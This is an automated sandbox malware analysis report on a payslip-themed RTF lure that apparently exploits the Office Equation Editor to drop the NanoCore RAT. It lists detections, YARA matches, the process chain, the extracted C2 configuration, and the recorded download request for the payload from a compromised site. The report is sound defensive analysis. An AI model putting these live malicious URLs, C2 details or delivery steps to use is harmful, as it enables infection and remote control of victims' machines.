Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Payslip_APR_2022.doc

Overview

General Information

Sample Name:Payslip_APR_2022.doc
Analysis ID:627852
MD5:c1b99cb9c9cf56fe0355737e4e5df1fa
SHA1:c02627c990717d30ff577c6fbd6381393ade7bb1
SHA256:425e84ac9fe60970bd317ede9d84555b1f994e9c2c102e44d6ed71e7f47797c6
Tags:doc
Infos:

Detection

Nanocore
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Sigma detected: EQNEDT32.EXE connecting to internet
Initial sample is an obfuscated RTF file
Sigma detected: NanoCore
Detected Nanocore Rat
Antivirus detection for URL or domain
Antivirus detection for dropped file
Yara detected Nanocore RAT
Snort IDS alert for network traffic
Found malware configuration
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Sigma detected: File Dropped By EQNEDT32EXE
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Office equation editor drops PE file
Hides that the sample has been downloaded from the Internet (zone.identifier)
Uses dynamic DNS services
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Office equation editor establishes network connection
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Found evasive API chain (may stop execution after checking a module file name)
Downloads executable code via HTTP
Document misses a certain OLE stream usually present in this Microsoft Office document type
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to shutdown / reboot the system
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
Potential document exploit detected (performs DNS queries)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Document contains Microsoft Equation 3.0 OLE entries
Enables debug privileges
Installs a raw input device (often for capturing keystrokes)
Extensive use of GetProcAddress (often used to hide API calls)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Detected TCP or UDP traffic on non-standard ports
Office Equation Editor has been started
Potential document exploit detected (performs HTTP gets)

Classification

  • System is w7x64
  • WINWORD.EXE (PID: 3024 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
  • EQNEDT32.EXE (PID: 2868 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • dll.exe (PID: 1316 cmdline: C:\Users\user\AppData\Roaming\dll.exe MD5: F32D1F6E94DA654932E73E42F0F4773A)
      • jqenyeo.exe (PID: 808 cmdline: C:\Users\user\AppData\Local\Temp\jqenyeo.exe C:\Users\user\AppData\Local\Temp\hjmxlwxk MD5: 22A5EC1E72CE0D23B1598C40639BB3B2)
        • jqenyeo.exe (PID: 324 cmdline: C:\Users\user\AppData\Local\Temp\jqenyeo.exe C:\Users\user\AppData\Local\Temp\hjmxlwxk MD5: 22A5EC1E72CE0D23B1598C40639BB3B2)
  • ltqmdmdi.exe (PID: 2452 cmdline: "C:\Users\user\AppData\Roaming\mtmgxghqo\ltqmdmdi.exe" MD5: 22A5EC1E72CE0D23B1598C40639BB3B2)
  • cleanup
{"Version": "1.2.2.0", "Mutex": "b07368c6-c9e6-43bc-939d-00b8dbf6", "Group": "Memphis", "Domain1": "stonecold.ddns.net", "Domain2": "stonecold.ddns.net", "Port": 2702, "RunOnStartup": "Disable", "RequestElevation": "Disable", "BypassUAC": "Disable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8", "BackupDNSServer": "8.8.4.4"}
SourceRuleDescriptionAuthorStrings
Payslip_APR_2022.docINDICATOR_RTF_MalVer_ObjectsDetects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.ditekSHen
  • 0x96:$obj2: \objdata
  • 0xb7:$obj2: \objdata
  • 0x441:$obj3: \objupdate
  • 0x72:$obj4: \objemb
SourceRuleDescriptionAuthorStrings
00000007.00000002.1177072990.0000000000400000.00000040.00000400.00020000.00000000.sdmpNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
  • 0x241e5:$x1: NanoCore.ClientPluginHost
  • 0x24222:$x2: IClientNetworkHost
  • 0x27d55:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000007.00000002.1177072990.0000000000400000.00000040.00000400.00020000.00000000.sdmpNanocore_RAT_Feb18_1Detects Nanocore RATFlorian Roth
  • 0x23f5d:$x1: NanoCore Client.exe
  • 0x241e5:$x2: NanoCore.ClientPluginHost
  • 0x2581e:$s1: PluginCommand
  • 0x25812:$s2: FileCommand
  • 0x266c3:$s3: PipeExists
  • 0x2c47a:$s4: PipeCreated
  • 0x2420f:$s5: IClientLoggingHost
00000007.00000002.1177072990.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_NanocoreYara detected Nanocore RATJoe Security
    00000007.00000002.1177072990.0000000000400000.00000040.00000400.00020000.00000000.sdmpMALWARE_Win_NanoCoreDetects NanoCoreditekSHen
    • 0x23f4d:$x1: NanoCore Client
    • 0x23f5d:$x1: NanoCore Client
    • 0x241a5:$x2: NanoCore.ClientPlugin
    • 0x241e5:$x3: NanoCore.ClientPluginHost
    • 0x2419a:$i1: IClientApp
    • 0x241bb:$i2: IClientData
    • 0x241c7:$i3: IClientNetwork
    • 0x241d6:$i4: IClientAppHost
    • 0x241ff:$i5: IClientDataHost
    • 0x2420f:$i6: IClientLoggingHost
    • 0x24222:$i7: IClientNetworkHost
    • 0x24235:$i8: IClientUIHost
    • 0x24243:$i9: IClientNameObjectCollection
    • 0x2425f:$i10: IClientReadOnlyNameObjectCollection
    • 0x23fac:$s1: ClientPlugin
    • 0x241ae:$s1: ClientPlugin
    • 0x246a2:$s2: EndPoint
    • 0x246ab:$s3: IPAddress
    • 0x246b5:$s4: IPEndPoint
    • 0x260eb:$s6: get_ClientSettings
    • 0x2668f:$s7: get_Connected
    00000007.00000002.1177072990.0000000000400000.00000040.00000400.00020000.00000000.sdmpNanoCoreunknown Kevin Breen <kevin@techanarchy.net>
    • 0x23f4d:$a: NanoCore
    • 0x23f5d:$a: NanoCore
    • 0x24191:$a: NanoCore
    • 0x241a5:$a: NanoCore
    • 0x241e5:$a: NanoCore
    • 0x23fac:$b: ClientPlugin
    • 0x241ae:$b: ClientPlugin
    • 0x241ee:$b: ClientPlugin
    • 0x240d3:$c: ProjectData
    • 0x24ada:$d: DESCrypto
    • 0x2c4a6:$e: KeepAlive
    • 0x2a494:$g: LogClientMessage
    • 0x2668f:$i: get_Connected
    • 0x24e10:$j: #=q
    • 0x24e40:$j: #=q
    • 0x24e5c:$j: #=q
    • 0x24e8c:$j: #=q
    • 0x24ea8:$j: #=q
    • 0x24ec4:$j: #=q
    • 0x24ef4:$j: #=q
    • 0x24f10:$j: #=q
    Click to see the 38 entries
    SourceRuleDescriptionAuthorStrings
    7.2.jqenyeo.exe.414058.1.unpackNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
    • 0xe38d:$x1: NanoCore.ClientPluginHost
    • 0xe3ca:$x2: IClientNetworkHost
    • 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
    7.2.jqenyeo.exe.414058.1.unpackNanocore_RAT_Feb18_1Detects Nanocore RATFlorian Roth
    • 0xe105:$x1: NanoCore Client.exe
    • 0xe38d:$x2: NanoCore.ClientPluginHost
    • 0xf9c6:$s1: PluginCommand
    • 0xf9ba:$s2: FileCommand
    • 0x1086b:$s3: PipeExists
    • 0x16622:$s4: PipeCreated
    • 0xe3b7:$s5: IClientLoggingHost
    7.2.jqenyeo.exe.414058.1.unpackJoeSecurity_NanocoreYara detected Nanocore RATJoe Security
      7.2.jqenyeo.exe.414058.1.unpackMALWARE_Win_NanoCoreDetects NanoCoreditekSHen
      • 0xe0f5:$x1: NanoCore Client
      • 0xe105:$x1: NanoCore Client
      • 0xe34d:$x2: NanoCore.ClientPlugin
      • 0xe38d:$x3: NanoCore.ClientPluginHost
      • 0xe342:$i1: IClientApp
      • 0xe363:$i2: IClientData
      • 0xe36f:$i3: IClientNetwork
      • 0xe37e:$i4: IClientAppHost
      • 0xe3a7:$i5: IClientDataHost
      • 0xe3b7:$i6: IClientLoggingHost
      • 0xe3ca:$i7: IClientNetworkHost
      • 0xe3dd:$i8: IClientUIHost
      • 0xe3eb:$i9: IClientNameObjectCollection
      • 0xe407:$i10: IClientReadOnlyNameObjectCollection
      • 0xe154:$s1: ClientPlugin
      • 0xe356:$s1: ClientPlugin
      • 0xe84a:$s2: EndPoint
      • 0xe853:$s3: IPAddress
      • 0xe85d:$s4: IPEndPoint
      • 0x10293:$s6: get_ClientSettings
      • 0x10837:$s7: get_Connected
      7.2.jqenyeo.exe.414058.1.unpackNanoCoreunknown Kevin Breen <kevin@techanarchy.net>
      • 0xe0f5:$a: NanoCore
      • 0xe105:$a: NanoCore
      • 0xe339:$a: NanoCore
      • 0xe34d:$a: NanoCore
      • 0xe38d:$a: NanoCore
      • 0xe154:$b: ClientPlugin
      • 0xe356:$b: ClientPlugin
      • 0xe396:$b: ClientPlugin
      • 0xe27b:$c: ProjectData
      • 0xec82:$d: DESCrypto
      • 0x1664e:$e: KeepAlive
      • 0x1463c:$g: LogClientMessage
      • 0x10837:$i: get_Connected
      • 0xefb8:$j: #=q
      • 0xefe8:$j: #=q
      • 0xf004:$j: #=q
      • 0xf034:$j: #=q
      • 0xf050:$j: #=q
      • 0xf06c:$j: #=q
      • 0xf09c:$j: #=q
      • 0xf0b8:$j: #=q
      Click to see the 125 entries

      AV Detection

      barindex
      Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\jqenyeo.exe, ProcessId: 324, TargetFilename: C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\run.dat

      Exploits

      barindex
      Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 43.245.183.172, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2868, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49171
      Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2868, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\jnstp[1].exe

      E-Banking Fraud

      barindex
      Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\jqenyeo.exe, ProcessId: 324, TargetFilename: C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\run.dat

      Stealing of Sensitive Information

      barindex
      Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\jqenyeo.exe, ProcessId: 324, TargetFilename: C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\run.dat

      Remote Access Functionality

      barindex
      Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\jqenyeo.exe, ProcessId: 324, TargetFilename: C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\run.dat
      Timestamp:192.168.2.2243.245.183.17249171802021697 05/16/22-22:07:10.242522
      SID:2021697
      Source Port:49171
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: http://lutanedukasi.co.id/wp-includes/jnstp.exejAvira URL Cloud: Label: malware
      Source: http://lutanedukasi.co.id/wp-includes/jnstp.exeAvira URL Cloud: Label: malware
      Source: http://lutanedukasi.co.id/wp-includes/jnstp.exejjC:Avira URL Cloud: Label: malware
      Source: http://lutanedukasi.co.id/wp-includes/jnstp.exeC:Avira URL Cloud: Label: malware
      Source: http://lutanedukasi.co.id/wp-includes/jnstp.exeTAvira URL Cloud: Label: malware
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{E418C216-F903-4F08-9D65-89DE9868688C}.tmpAvira: detection malicious, Label: EXP/CVE-2017-11882.Gen
      Source: Yara matchFile source: 7.2.jqenyeo.exe.414058.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 7.0.jqenyeo.exe.400000.5.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 7.2.jqenyeo.exe.4ae4629.12.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 7.0.jqenyeo.exe.400000.8.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 7.2.jqenyeo.exe.32f4415.8.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 7.0.jqenyeo.exe.400000.7.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 7.2.jqenyeo.exe.5fb140.3.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 7.2.jqenyeo.exe.400000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 7.2.jqenyeo.exe.550000.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 7.2.jqenyeo.exe.550000.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 7.2.jqenyeo.exe.5fb140.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 7.0.jqenyeo.exe.400000.10.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 5.2.jqenyeo.exe.330000.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 5.2.jqenyeo.exe.330000.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 7.2.jqenyeo.exe.32efdec.7.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 7.2.jqenyeo.exe.4ae0000.11.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 5.2.jqenyeo.exe.341658.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 7.2.jqenyeo.exe.32efdec.7.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 7.2.jqenyeo.exe.414058.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 7.2.jqenyeo.exe.1ed0000.4.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 5.2.jqenyeo.exe.341658.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 7.2.jqenyeo.exe.32eafb6.6.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 7.0.jqenyeo.exe.400000.9.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 7.0.jqenyeo.exe.400000.6.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 7.2.jqenyeo.exe.4ae0000.11.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 7.2.jqenyeo.exe.400000.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 00000007.00000002.1177072990.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000007.00000000.925605410.0000000000414000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000007.00000002.1177611685.00000000032E9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000007.00000000.924356311.0000000000414000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000007.00000002.1177965597.0000000004AE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000002.930427801.0000000000330000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000007.00000002.1177133041.0000000000550000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000007.00000002.1177349717.0000000002271000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000007.00000002.1177195760.00000000005ED000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000007.00000002.1177296193.0000000001ED2000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: jqenyeo.exe PID: 808, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: jqenyeo.exe PID: 324, type: MEMORYSTR
      Source: 00000007.00000002.1177611685.00000000032E9000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: NanoCore {"Version": "1.2.2.0", "Mutex": "b07368c6-c9e6-43bc-939d-00b8dbf6", "Group": "Memphis", "Domain1": "stonecold.ddns.net", "Domain2": "stonecold.ddns.net", "Port": 2702, "RunOnStartup": "Disable", "RequestElevation": "Disable", "BypassUAC": "Disable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8", "BackupDNSServer": "8.8.4.4"}
      Source: Payslip_APR_2022.docVirustotal: Detection: 34%Perma Link
      Source: Payslip_APR_2022.docReversingLabs: Detection: 24%
      Source: lutanedukasi.co.idVirustotal: Detection: 11%Perma Link
      Source: http://lutanedukasi.co.id/wp-includes/jnstp.exeVirustotal: Detection: 13%Perma Link
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\jnstp[1].exeReversingLabs: Detection: 53%
      Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeReversingLabs: Detection: 23%
      Source: C:\Users\user\AppData\Roaming\dll.exeReversingLabs: Detection: 53%
      Source: C:\Users\user\AppData\Roaming\mtmgxghqo\ltqmdmdi.exeReversingLabs: Detection: 23%
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\jnstp[1].exeJoe Sandbox ML: detected
      Source: C:\Users\user\AppData\Roaming\dll.exeJoe Sandbox ML: detected
      Source: 7.2.jqenyeo.exe.400000.0.unpackAvira: Label: TR/Dropper.MSIL.Gen7
      Source: 7.0.jqenyeo.exe.400000.5.unpackAvira: Label: TR/Dropper.MSIL.Gen7
      Source: 7.0.jqenyeo.exe.400000.8.unpackAvira: Label: TR/Dropper.MSIL.Gen7
      Source: 8.2.ltqmdmdi.exe.400000.0.unpackAvira: Label: TR/Crypt.EPACK.Gen2
      Source: 7.0.jqenyeo.exe.400000.7.unpackAvira: Label: TR/Dropper.MSIL.Gen7
      Source: 7.0.jqenyeo.exe.400000.10.unpackAvira: Label: TR/Dropper.MSIL.Gen7
      Source: 7.2.jqenyeo.exe.4ae0000.11.unpackAvira: Label: TR/NanoCore.fadte
      Source: 5.2.jqenyeo.exe.400000.3.unpackAvira: Label: TR/Crypt.EPACK.Gen2
      Source: 7.2.jqenyeo.exe.1ed0000.4.unpackAvira: Label: TR/Dropper.MSIL.Gen7
      Source: 2.3.EQNEDT32.EXE.346c28.0.unpackAvira: Label: TR/Patched.Ren.Gen
      Source: 7.0.jqenyeo.exe.400000.9.unpackAvira: Label: TR/Dropper.MSIL.Gen7
      Source: 7.0.jqenyeo.exe.400000.6.unpackAvira: Label: TR/Dropper.MSIL.Gen7
      Source: 2.3.EQNEDT32.EXE.346c28.1.unpackAvira: Label: TR/Patched.Ren.Gen

      Exploits

      barindex
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\dll.exe
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\dll.exe
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXENetwork connect: IP: 43.245.183.172 Port: 80
      Source: ~WRF{E418C216-F903-4F08-9D65-89DE9868688C}.tmp.0.drStream path '_1714243988/\x1CompObj' : ...........................F....Microsoft Equation
      Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
      Source: Binary string: wntdll.pdb source: jqenyeo.exe, 00000005.00000003.922226996.0000000002660000.00000004.00001000.00020000.00000000.sdmp, jqenyeo.exe, 00000005.00000003.924894194.00000000031E0000.00000004.00001000.00020000.00000000.sdmp
      Source: C:\Users\user\AppData\Roaming\dll.exeCode function: 4_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,
      Source: C:\Users\user\AppData\Roaming\dll.exeCode function: 4_2_0040699E FindFirstFileW,FindClose,
      Source: C:\Users\user\AppData\Roaming\dll.exeCode function: 4_2_0040290B FindFirstFileW,
      Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeCode function: 7_2_0040572A FindFirstFileExW,
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 43.245.183.172:80
      Source: global trafficDNS query: name: lutanedukasi.co.id
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 43.245.183.172:80

      Networking

      barindex
      Source: TrafficSnort IDS: 2021697 ET TROJAN EXE Download Request To Wordpress Folder Likely Malicious 192.168.2.22:49171 -> 43.245.183.172:80
      Source: unknownDNS query: name: stonecold.ddns.net
      Source: Malware configuration extractorURLs: stonecold.ddns.net
      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKContent-Type: application/octet-streamLast-Modified: Mon, 16 May 2022 09:10:41 GMTAccept-Ranges: bytesETag: "7a6a39d1469d81:0"Server: Microsoft-IIS/7.5X-Powered-By: ASP.NETDate: Mon, 16 May 2022 20:07:08 GMTContent-Length: 328454Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ad 31 08 81 e9 50 66 d2 e9 50 66 d2 e9 50 66 d2 2a 5f 39 d2 eb 50 66 d2 e9 50 67 d2 4c 50 66 d2 2a 5f 3b d2 e6 50 66 d2 bd 73 56 d2 e3 50 66 d2 2e 56 60 d2 e8 50 66 d2 52 69 63 68 e9 50 66 d2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 1f 9b 4f 61 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 68 00 00 00 2a 02 00 00 08 00 00 40 36 00 00 00 10 00 00 00 80 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 c0 03 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 04 85 00 00 a0 00 00 00 00 b0 03 00 50 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 76 66 00 00 00 10 00 00 00 68 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 9a 13 00 00 00 80 00 00 00 14 00 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 78 03 02 00 00 a0 00 00 00 06 00 00 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 00 01 00 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 50 0a 00 00 00 b0 03 00 00 0c 00 00 00 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
      Source: global trafficHTTP traffic detected: GET /wp-includes/jnstp.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: lutanedukasi.co.idConnection: Keep-Alive
      Source: Joe Sandbox ViewASN Name: SOFTLAYERUS SOFTLAYERUS
      Source: Joe Sandbox ViewASN Name: INFINYS-AS-IDPTInfinysSystemIndonesiaID INFINYS-AS-IDPTInfinysSystemIndonesiaID
      Source: Joe Sandbox ViewIP Address: 43.245.183.172 43.245.183.172
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 45.132.226.1:2702
      Source: EQNEDT32.EXE, EQNEDT32.EXE, 00000002.00000003.909460483.0000000000342000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.899536396.0000000000324000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.909424895.0000000000334000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.899513606.00000000002F4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.912071092.000000000030E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lutanedukasi.co.id/wp-includes/jnstp.exe
      Source: EQNEDT32.EXE, 00000002.00000003.909460483.0000000000342000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.909424895.0000000000334000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lutanedukasi.co.id/wp-includes/jnstp.exeC:
      Source: EQNEDT32.EXE, 00000002.00000003.899513606.00000000002F4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.912071092.000000000030E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lutanedukasi.co.id/wp-includes/jnstp.exeT
      Source: EQNEDT32.EXE, 00000002.00000002.911909348.00000000002CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lutanedukasi.co.id/wp-includes/jnstp.exej
